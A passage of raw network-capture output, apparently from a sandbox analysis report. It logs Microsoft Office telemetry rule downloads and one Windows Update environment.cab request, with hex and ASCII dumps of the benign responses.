2024-11-21 08:54:29 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:28 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 99b43a4d-701e-003e-13dc-3b79b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085428Z-r1d97b99577n4dznhC1TEBc1qw0000000a3000000000bpct x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:29 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:28 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:29 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:29 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085429Z-178bfbc474bv587zhC1NYCny5w00000001400000000067d3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:29 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:30 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:30 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:30 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 44a56bea-901e-0064-626a-3be8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085430Z-178bfbc474bvjk8shC1NYC83ns0000000130000000006tyw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:30 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:30 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:30 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:30 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085430Z-r1d97b9957747b9jhC1TEBgyec0000000a5g00000000c187 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:30 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.6	49868	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:30 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RT2Ar76CfwNaFOF&MD=4E5ho6Ol HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-21 08:54:31 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 3b3888ef-eaa9-4b75-8280-a5e78e9db055 MS-RequestId: 53d1dc47-ad1c-4e1b-9a66-b762f5b8bd34 MS-CV: zGlwSBHwAkKS8H76.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 21 Nov 2024 08:54:30 GMT Connection: close Content-Length: 30005
2024-11-21 08:54:31 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-21 08:54:31 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	49869	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:30 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:31 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:31 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: bb72f529-c01e-00ad-208a-3ba2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085431Z-1777c6cb7549x5qchC1TEBggbg0000000aug00000000fp1w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:31 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.6	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:30 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:31 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:31 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 57f4d0d3-201e-0033-0b7c-3bb167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085431Z-1777c6cb754wcxkwhC1TEB3c6w0000000aw0000000001fuw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:31 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.6	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:31 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:31 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:31 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085431Z-178bfbc474bq2pr7hC1NYCkfgg00000001ag00000000a4z1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:31 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:32 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:32 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:32 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 06e9cdc8-b01e-0002-45ce-3b1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085432Z-178bfbc474bvjk8shC1NYC83ns0000000160000000000g65 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:32 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:32 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:32 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:32 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085432Z-r1d97b99577d6qrbhC1TEBux5s0000000a900000000062sk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:32 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:33 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:33 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:33 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: c743bc84-701e-006f-2bdb-3bafc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085433Z-r1d97b9957744xz5hC1TEB5bf800000009xg00000000cr08 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:33 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:33 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
